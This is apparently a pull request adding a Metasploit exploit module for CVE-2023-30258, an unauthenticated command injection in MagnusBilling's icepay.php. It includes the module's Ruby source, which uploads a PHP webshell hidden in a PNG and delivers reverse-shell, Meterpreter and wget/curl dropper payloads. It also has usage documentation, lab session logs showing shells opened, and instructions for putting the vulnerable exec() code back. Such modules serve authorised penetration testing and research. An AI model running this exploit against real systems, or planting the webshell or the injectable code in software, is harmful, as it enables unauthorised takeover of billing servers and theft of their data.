### PR TITLE
MagnusBilling unauthenticated RCE [CVE-2023-30258]

### DIFF
--- a/documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
+++ b/documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
@@ -1,0 +1,240 @@
+## Vulnerable Application
+`MagnusBilling` is an open source tool written in `PHP` and `JAVASCRIPT`, aimed at IP telephony providers.
+It provides a complete and powerful system for anyone to start an IP telephony provider.
+Unfortunately a command injection vulnerability exists in `MagnusBilling` versions 6 and 7.
+The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
+This is caused by a piece of demonstration code which is present in `lib/icepay/icepay.php`, with a call to `exec()` at line 753.
+The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.
+
+An unauthenticated user is able to execute arbitrary OS commands.
+The commands run with the privileges of the web server process, typically `www-data`.
+At a minimum, this allows an attacker to compromise the billing system and its database.
+
+See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information.
+
+## Installation
+This module has been tested on:
+- Debian 12.2 running on  VirtualBox 7 with MagnusBilling 7 installed.
+
+### Installation steps
+* Install Debian 11 or later on VirtualBox.
+* Follow these [instructions](https://linux.how2shout.com/install-debian-11-bullseye-on-virtualbox/).
+* Login into Debian Linux machine.
+* Switch to root with `su -` if needed.
+* Follow  the install instructions for either [MagnusBilling 7](https://github.com/magnussolution/magnusbilling7) or
+[MagnusBilling 6](https://github.com/magnussolution/magnusbilling6)
+* After successful installation, you can test the module with the verification steps listed at the **Verification** section.
+
+PS: If you have installed MagnusBilling 7, please update the `mbilling/lib/icepay/icepay.php` file at the web server root,
+typically `/var/www/html`, by adding the vulnerable code below.
+```php
+if (isset($_GET['demo'])) {
+
+    if ($_GET['demo'] == 1) {
+        exec("touch idepay_proccess.php");
+    } else {
+        exec("rm -rf idepay_proccess.php");
+    }
+}
+if (isset($_GET['democ'])) {
+    if (strlen($_GET['democ']) > 5) {
+        exec("touch " . $_GET['democ'] . '.txt');
+    } else {
+        exec("rm -rf *.txt");
+    }
+}
+```
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258`
+- [x] `set rhosts <ip-target>`
+- [x] `set rport <port>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `shell` or `Meterpreter` session.
+```ShellSession
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info
+
+       Name: Magnusbilling application unauthenticated Remote Command Execution.
+     Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
+   Platform: PHP, Unix, Linux
+       Arch: php, cmd, x64, x86
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2023-06-26
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Eldstal
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting         Required  Description
+  ----       ---------------         --------  -----------
+  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
+                                               /using-metasploit.html
+  RPORT      80                      yes       The target port (TCP)
+  SSL        false                   no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /mbilling               yes       The MagnusBilling endpoint URL
+  URIPATH                            no        The URI to use for this exploit (default is random)
+  VHOST                              no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
+                                      chine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+
+  When TARGET is 0:
+
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left
+                                       unset.
+
+Payload information:
+
+Description:
+  A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+  remote attackers to run arbitrary commands via unauthenticated HTTP request.
+  A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
+  The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
+  not properly sanitised/escaped.
+  After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
+  The commands run with the privileges of the web server process, typically `www-data`.
+  At a minimum, this allows an attacker to compromise the billing system and its database.
+
+  The following magnusbilling applications are vulnerable:
+  - Magnusbilling application version 6 (all versions);
+  - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-30258
+  https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
+  https://eldstal.se/advisories/230327-magnusbilling.html
+
+
+View the full module info with the info -d command.
+```
+
+## Options
+### TARGETURI
+The uripath to the `MagnusBilling` web application. Default set is to `/mbilling`.
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+## Scenarios
+###  MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
+```ShellSession
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
+rhosts => 192.168.201.34
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.34:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 5 seconds.
+[*] Elapsed time: 5.1 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.34
+[+] Deleted LfsCVIttNL.php
+[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.34:46230) at 2023-10-24 10:26:47 +0000
+
+meterpreter > getuid
+Server username: asterisk
+meterpreter > sysinfo
+Computer    : debian
+OS          : Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+###  MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
+```ShellSession
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
+target => 1
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.34:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 2.1 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.34:46396) at 2023-10-24 17:09:45 +0000
+
+uname -a
+Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
+id
+uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
+pwd
+/var/www/html/mbilling/lib/icepay
+```
+###  MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
+```ShellSession
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
+target => 2
+msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.34:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 4 seconds.
+[*] Elapsed time: 4.09 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/3X16QTzG27N
+[*] Client 192.168.201.34 (Wget/1.21.3) requested /3X16QTzG27N
+[*] Sending payload to 192.168.201.34 (Wget/1.21.3)
+[*] Sending stage (3045380 bytes) to 192.168.201.34
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.34:55224) at 2023-10-24 17:12:05 +0000
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.34
+OS           : Debian 12.2 (Linux 6.1.0-13-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: asterisk
+meterpreter > pwd
+/var/www/html/mbilling/lib/icepay
+meterpreter >
+```
+
+## Limitations
+No limitations identified.

--- a/documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
+++ b/documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
@@ -7,7 +7,7 @@ This is caused by a piece of demonstration code which is present in `lib/icepay/
 The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.
 
 An unauthenticated user is able to execute arbitrary OS commands.
-The commands run with the privileges of the web server process, typically `www-data`.
+The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
 At a minimum, this allows an attacker to compromise the billing system and its database.
 
 See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information.
@@ -15,6 +15,7 @@ See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-
 ## Installation
 This module has been tested on:
 - Debian 12.2 running on  VirtualBox 7 with MagnusBilling 7 installed.
+- CentOS 7 running on  VirtualBox 7 with MagnusBilling 6 installed.
 
 ### Installation steps
 * Install Debian 11 or later on VirtualBox.

--- a/documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
+++ b/documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
@@ -55,10 +55,10 @@ if (isset($_GET['democ'])) {
 - [x] `exploit`
 
 you should get a `shell` or `Meterpreter` session.
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info
 
-       Name: Magnusbilling application unauthenticated Remote Command Execution.
+       Name: MagnusBilling application unauthenticated Remote Command Execution.
      Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
    Platform: PHP, Unix, Linux
        Arch: php, cmd, x64, x86
@@ -124,7 +124,7 @@ Basic options:
 Payload information:
 
 Description:
-  A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+  A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
   remote attackers to run arbitrary commands via unauthenticated HTTP request.
   A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
   The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
@@ -133,9 +133,9 @@ Description:
   The commands run with the privileges of the web server process, typically `www-data`.
   At a minimum, this allows an attacker to compromise the billing system and its database.
 
-  The following magnusbilling applications are vulnerable:
-  - Magnusbilling application version 6 (all versions);
-  - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+  The following MagnusBilling applications are vulnerable:
+  - MagnusBilling application version 6 (all versions);
+  - MagnusBilling application up to version 7.x and including commit 7af21ed620;
 
 References:
   https://nvd.nist.gov/vuln/detail/CVE-2023-30258
@@ -156,7 +156,7 @@ to bypass any security settings on the Web and PHP server.
 
 ## Scenarios
 ###  MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
 rhosts => 192.168.201.34
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
@@ -181,7 +181,7 @@ Meterpreter : php/linux
 meterpreter >
 ```
 ###  MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
 target => 1
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
@@ -203,7 +203,7 @@ pwd
 /var/www/html/mbilling/lib/icepay
 ```
 ###  MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
 target => 2
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

--- a/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
+++ b/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
@@ -1,0 +1,191 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Format::PhpPayloadPng
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Magnusbilling application unauthenticated Remote Command Execution.',
+        'Description' => %q{
+          A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+          remote attackers to run arbitrary commands via unauthenticated HTTP request.
+          A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
+          The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
+          not properly sanitised/escaped.
+          After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
+          The commands run with the privileges of the web server process, typically `www-data`.
+          At a minimum, this allows an attacker to compromise the billing system and its database.
+
+          The following magnusbilling applications are vulnerable:
+          - Magnusbilling application version 6 (all versions);
+          - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Eldstal' # Discovery of the vulnerability
+
+        ],
+        'References' => [
+          ['CVE', '2023-30258'],
+          ['URL', 'https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258'],
+          ['URL', 'https://eldstal.se/advisories/230327-magnusbilling.html']
+        ],
+        'DisclosureDate' => '2023-06-26',
+        'Platform' => ['php', 'unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
+              'Linemax' => 2048,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The MagnusBilling endpoint URL', '/mbilling' ]),
+      OptString.new('WEBSHELL', [
+        false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
+      ], conditions: %w[TARGET == 0])
+    ])
+  end
+
+  def execute_command(cmd, _opts = {})
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', 'icepay.php'),
+      'vars_get' =>
+        {
+          'democ' => "/dev/null;#{cmd};#"
+        }
+    })
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = if datastore['WEBSHELL'].blank?
+                       "#{Rex::Text.rand_text_alpha(8..16)}.php"
+                     else
+                       datastore['WEBSHELL'].to_s
+                     end
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    # inject PHP payload into the PLTE chunk of a PNG image to hide the payload
+    php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+    png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
+    return nil if png_webshell.nil?
+
+    # encode webshell data and write to file on the target for execution
+    payload = Base64.strict_encode64(png_webshell.to_s)
+    cmd = "echo #{payload}|base64 -d > ./#{@webshell_name}"
+    execute_command(cmd)
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    # Check if target is a magnusbilling application
+    return CheckCode::Unknown('No response received from target.') unless res
+    return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i
+
+    # blind command injection using sleep command
+    sleep_time = rand(2..6)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    _res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
+    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time
+
+    CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :php
+      res = upload_webshell
+      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
+      register_file_for_cleanup(@webshell_name.to_s)
+      execute_php(payload.encoded)
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
+    end
+  end
+end

--- a/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
+++ b/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
@@ -26,12 +26,12 @@ class MetasploitModule < Msf::Exploit::Remote
           The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
           not properly sanitised/escaped.
           After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
-          The commands run with the privileges of the web server process, typically `www-data`.
+          The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
           At a minimum, this allows an attacker to compromise the billing system and its database.
 
           The following MagnusBilling applications are vulnerable:
           - MagnusBilling application version 6 (all versions);
-          - MagnusBilling application up to version 7.x and including commit 7af21ed620;
+          - MagnusBilling application up to version 7.x without commit 7af21ed620 which fixes this vulnerability;
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
+++ b/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
@@ -18,9 +18,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Magnusbilling application unauthenticated Remote Command Execution.',
+        'Name' => 'MagnusBilling application unauthenticated Remote Command Execution.',
         'Description' => %q{
-          A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+          A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
           remote attackers to run arbitrary commands via unauthenticated HTTP request.
           A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
           The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
@@ -29,9 +29,9 @@ class MetasploitModule < Msf::Exploit::Remote
           The commands run with the privileges of the web server process, typically `www-data`.
           At a minimum, this allows an attacker to compromise the billing system and its database.
 
-          The following magnusbilling applications are vulnerable:
-          - Magnusbilling application version 6 (all versions);
-          - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+          The following MagnusBilling applications are vulnerable:
+          - MagnusBilling application version 6 (all versions);
+          - MagnusBilling application up to version 7.x and including commit 7af21ed620;
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'PHP',
             {
-              'Platform' => 'php',
+              'Platform' => ['php'],
               'Arch' => ARCH_PHP,
               'Type' => :php,
               'DefaultOptions' => {
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Linux Dropper',
             {
-              'Platform' => 'linux',
+              'Platform' => ['linux'],
               'Arch' => [ARCH_X64, ARCH_X86],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
@@ -86,10 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => {
-          'RPORT' => 80,
-          'SSL' => false
-        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -143,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
     png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
     return nil if png_webshell.nil?
 
-    # encode webshell data and write to file on the target for execution
+    # encode webshell data, set write and execute permissions and write to file on the target for execution
     payload = Base64.strict_encode64(png_webshell.to_s)
-    cmd = "echo #{payload}|base64 -d > ./#{@webshell_name}"
+    cmd = "chmod 755 ./;echo #{payload}|base64 -d > ./#{@webshell_name}"
     execute_command(cmd)
   end
 
@@ -161,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i
 
     # blind command injection using sleep command
-    sleep_time = rand(2..6)
+    sleep_time = rand(4..8)
     print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
     _res, elapsed_time = Rex::Stopwatch.elapsed_time do
       execute_command("sleep #{sleep_time}")


### PR DESCRIPTION
`MagnusBilling` is an open source tool written in `PHP` and `JAVASCRIPT`, using the `EXTJS 6` and `YII FRAMEWORK` frameworks, aimed at IP telephony providers. It provides a complete and powerful system for anyone to start an IP telephony provider.

Unfortunately a command injection vulnerability exists in `MagnusBilling` versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server. This is caused by a piece of demonstration code which is present in `lib/icepay/icepay.php`, with a call to `exec()` at line 753. The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically `www-data` or `asterisk`. At a minimum, this allows an attacker to compromise the billing system and its database.

See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information. 

This module has been tested on:
- Debian 12.2 running on  VirtualBox 7 with MagnusBilling 7 installed.
- CentOS 7 running on  VirtualBox 7 with MagnusBilling 6 installed.

## Installation steps
* Install Debian 11 or later on VirtualBox using these [instructions](https://linux.how2shout.com/install-debian-11-bullseye-on-virtualbox/).
* Login into Debian Linux machine.
* Switch to root with `su -` if needed.
* Follow  the install instructions for either [MagnusBilling 7](https://github.com/magnussolution/magnusbilling7) or
[MagnusBilling 6](https://github.com/magnussolution/magnusbilling6)
* After successful installation, you can test the module with the verification steps listed at the **Verification** section.

PS: If you have installed MagnusBilling 7, please update the `mbilling/lib/icepay/icepay.php` file at the web server root (typically `/var/www/html`) by adding the vulnerable code below.
```php
if (isset($_GET['demo'])) {

    if ($_GET['demo'] == 1) {
        exec("touch idepay_proccess.php");
    } else {
        exec("rm -rf idepay_proccess.php");
    }
}
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}
```
## Verification
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258`
- [x] `set rhosts <ip-target>`
- [x] `set rport <port>`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [x] `exploit`

you should get a `shell` or `Meterpreter` session.
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info

       Name: MagnusBilling application unauthenticated Remote Command Execution.
     Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-06-26

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Eldstal

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting         Required  Description
  ----       ---------------         --------  -----------
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                               /using-metasploit.html
  RPORT      80                      yes       The target port (TCP)
  SSL        false                   no        Negotiate SSL/TLS for outgoing connections
  SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /mbilling               yes       The MagnusBilling endpoint URL
  URIPATH                            no        The URI to use for this exploit (default is random)
  VHOST                              no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                      chine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.


  When TARGET is 0:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left
                                       unset.

Payload information:

Description:
  A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
  remote attackers to run arbitrary commands via unauthenticated HTTP request.
  A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
  The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
  not properly sanitised/escaped.
  After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
  The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
  At a minimum, this allows an attacker to compromise the billing system and its database.

  The following MagnusBilling applications are vulnerable:
  - MagnusBilling application version 6 (all versions);
  - MagnusBilling application up to version 7.x excluding commit 7af21ed620 which fixes this vulnerability;

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-30258
  https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
  https://eldstal.se/advisories/230327-magnusbilling.html


View the full module info with the info -d command.
```
## Scenarios
###  MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
rhosts => 192.168.201.34
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.34
[+] Deleted LfsCVIttNL.php
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.34:46230) at 2023-10-24 10:26:47 +0000

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
Meterpreter : php/linux
meterpreter >
```
###  MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
target => 1
